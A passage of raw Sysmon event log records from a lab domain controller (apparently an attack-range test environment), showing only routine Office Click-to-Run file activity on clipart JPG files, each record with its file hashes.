Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0386270.JPGMD5=DF7E3FDD2815F6685A6834621B1B45D2,SHA256=2B085034F9F2C33B63876BE1428506EB4BB57E5D6BA9AC35EF074F6C2F0D5CFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0386267.JPGMD5=32523CFF14011D7674F20C867C230102,SHA256=7F481D070E5090B9D3029CEA59AC678E40B659A03EBCC2E45020F97AC5D1D8E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0386120.JPGMD5=7582474A32337DD05F620B0E911E8051,SHA256=49DD7B86777470989003AE81BEE0C3D59E2DA900619527966425904F5821E396,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0384900.JPGMD5=356C8E7B5A7F5BFB3F81A264D681D35D,SHA256=25A0508FB5E72C43D00801B51C234EEF56F069DEB8877E250876E35317490492,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0384895.JPGMD5=E6E94BF650A1DDB596997B8AE75276E8,SHA256=F004716C5D016711975B9DA6AF4AD6D461926DBCFF27F2AB9435FF8130C89252,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0384888.JPGMD5=0B46932669029920484DDEB8E4A0D636,SHA256=D484D91C9E212CBBCB2E63B29EEFC63E5B5CE4981961DDC7B3F0377F44A688A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0384885.JPGMD5=D4A7EABF7250848B645C21EB098B54F0,SHA256=6013351F79D086D9183EAEE6B90C350C5299BC15C3035EF7558D14172086ED10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0384862.JPGMD5=BBB444F37AAA2D0AA12EAE975D49FA4C,SHA256=4FCC52C865E234BD1F228130C860F08D9D59BA950131C6D987E2E71ED83A7B27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382970.JPGMD5=7D8D1601B067A602EAD3CE59ADF05088,SHA256=9090FEA2DB9FB56B7061A5BD08826485826D236BB9B031599300D7DE1BC062B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382969.JPGMD5=ABDC1FE0D67DB6C9B3E18D7E9D186E21,SHA256=5E212F7DCB230EA7D70EC7B2D4F8893899B21C8FE07A13FC7992D75202B060AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382968.JPGMD5=4371A56534FE3C41BC1E5D7707CC4902,SHA256=ACE8635BE9BC5530A901F63214D3514E98E7931E0DD7E3B7908A721B97CAB5D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382967.JPGMD5=3F938DF310D5F7F716B938CCDD2B74F2,SHA256=15590F9B09D2FC64B62750ECEAC679292FF3FBC511267F0654CD81B2D80E2282,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382966.JPGMD5=D86A15961F90F8F5537928D3E5FB3085,SHA256=65677F103B9A703E46F22F1C53CA0660896C3442CB6C2351D89ACFAEF61F6F11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382965.JPGMD5=F27B3B545AFE1653D0A7011BD2A15858,SHA256=A6F8E5920CCA991959BB0A9C7D2E8905A44358839D1F51DFC882B8A1C4888584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382963.JPGMD5=64A224FFD755D441B72806D5407EB2B5,SHA256=C7DEFA1439DBDD2D630F59F1E448FCF34254AF7288BF4BFF6AF5A0E223077A1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382962.JPGMD5=95660E7F223BEA4681EFBC549B45D66C,SHA256=23262988AD33E4ED7DE2AA6B2B9F19AE19B87C336D15B518E0708D98F1C143D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382961.JPGMD5=E2B7991A833F40850C78919303881BE5,SHA256=B29CF0623855EB8D6AA58F8957AE66557F13A5E1622AC6137412EBC819140935,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382960.JPGMD5=9CDFAEC8572B3C482820C4B6C0080924,SHA256=8243013990A2E25DA0786E34940E5FE85FCB7B5B16084F46CB4E40BE58991B74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382959.JPGMD5=A9F2106F6C12FFF9BDDC174C4D9EEE10,SHA256=4AE232AF10BA37BD3B06090205C882FA93818ABF09FFA42F2558B5D93195995B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382958.JPGMD5=24CBC59B28D921CD13F99094E7FD85FA,SHA256=6F9EEDA0407F781CCF8442DF260D38172BF041E4B08A21625E0AD6860C782894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382957.JPGMD5=79FAE4CAE267AFD37F554D0C43CDD2A8,SHA256=12A94C0CA341106DB8D6158093ADEF491E37D3BCA49EF3426E723528A14CBDB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382955.JPGMD5=393C5141F17F51289DD7CAEBABFAD740,SHA256=76C25BD9A65B0E8D091EB2F4DD242AD074D1F999BCA4A7DD0FA7FF60BAFCBF4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382954.JPGMD5=CFBB851720559CAED0D39935E4637B54,SHA256=7D0289774A7C2EB2F266BA5C51FFC42C8FD07D9DD7974E5EFADD1C3BEF8C3AED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382952.JPGMD5=3690E0CBBDA42A4066A97A2300137860,SHA256=F5366D61BD3E7EFBF7A8C6D474841999FDECE8580987C46087D6168B315EDC23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382950.JPGMD5=BCF0600A39C5582A37DB749320FDC353,SHA256=314B0B904421669177C779F94C60D6F25DC87297C863369EC12CE318C77E4067,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382948.JPGMD5=42000B3D52D7016480F5D5D85C47632F,SHA256=CB6E7347EE755A0EE44B1716A2E13C37DD0DAD1B384A752272672FBEF6CF45B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382947.JPGMD5=36DD2CCB55426E9B8020CECC2C2DB974,SHA256=BD649A9AEF3A5BED3801E8413C573179731C85B3E4D3BE11CC5AAECAA988B287,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382944.JPGMD5=C5DA624C70896CCE2D9EC8AA81AB957B,SHA256=5B565E998E10BBDF98DD7951DBB0F0FFC05A3D6D2B1C06C5FC534055239B1DEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382942.JPGMD5=593648DB0271300CB368034DB9CFC652,SHA256=D96B208AFE6D5E2FB9BC8B2E1973F6F4E7915372722E93E0DF962C8593B5AA78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382939.JPGMD5=6C0D30A9B6D1DE1C0A6578B6DE7E0340,SHA256=AFAC393F3FAD0E3E75BB4F9719D34A0E70418C2E36F3ED2A547C9D427EDA9B39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382938.JPGMD5=4533DBF060FC4F1EEA599CD55D135ECF,SHA256=FADBF6E852DAF01D2FE6725CF54B8C1196B8D72C9F183CBD41C42842DFEBE80B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382931.JPGMD5=6FF57B4DC979B84873D3080DB3D0DA2A,SHA256=88E93D5F2711016ED623630F84D94A590F8932BA8C1E05DF2B4D6C0955E048F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382930.JPGMD5=1AE3C69E7F83DD39E1F1B089B442AE91,SHA256=88558F43A6A3FB885724C6910BE7F267CD5EFEBDA7AAA02D54197C800C662189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382927.JPGMD5=5CEAE6CC2DA82CE026A6A1CD72A3B5B0,SHA256=4BC478F0BA9924E774777145B9C035A83FBD30120BDB2FF298A5ADE3D1B666BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382926.JPGMD5=C83EF7F2B273F47FFB23771439062DF1,SHA256=5B4D2711FD0F547362B6F3B7A04D5ABFF997174398FF7294759741A9F8414F0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382925.JPGMD5=A60977990F0803B0BB4B1146DF2B732A,SHA256=ECF07D14BD4C5797D55915BD6154339FDEC524B4CBD4BC501DB7CCC95C92C5D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0382836.JPGMD5=6948967820DACFF4EC2B29113E3DFDE1,SHA256=A50888B8272DB2F9184A6A7FFE9FC4380C19296B0E1B024EF4E81FB8E6FF7328,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341742.JPGMD5=28DB5E4EBE1C0AA34D320A13B368F776,SHA256=534864F9BDE3836B12A2D672F5419C31AA10A9E7E74B806231B98178756420A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341738.JPGMD5=1E7E24B861EA51A5F1D6E26FDFC837E4,SHA256=066A9DC21CBA102C9E306A0AC006CD762DC70CF9C9A4EFA52E2C35184027A454,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341654.JPGMD5=2DDC58A92343E7A05B88A1F49361E87E,SHA256=0BF653FCB79B8EC0B725A5DA14D6B18A6EB5A0EE6081F068EA458DF4795B2877,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341653.JPGMD5=8760A3D18BB132E3A8B4B96318978E0E,SHA256=0C6535466CF613C4037496969983EEA82B8CF9BA9DA2150AA012D19A6613A707,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341645.JPGMD5=A5FB21C42675ABDB2C0F04B968C34834,SHA256=6947CA4C761991CA3ECE59C02AA57A7FB2CDA11F73CF18B3C80C2D525F205AC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341636.JPGMD5=27F93E545F1B6B796B6A9A3CE330AF1A,SHA256=EAE592A30A7ADE3464EC9E77646E1BCD4CB5969F7ABFCCEE39F406498915FE7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341634.JPGMD5=8855F81683F7341DA795E04AEB86D06E,SHA256=780C11A2C702D3F3165BABE790F61AE0DE708AFD2970747C2CDA9944ED777E09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341561.JPGMD5=A6F9567326DBB950ED9D6A90BBE0447F,SHA256=CFFFFFC9A47D7A4EE46EF3D169A95F100AE97F1AB3465C0FC44DF2AE8BA7541E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 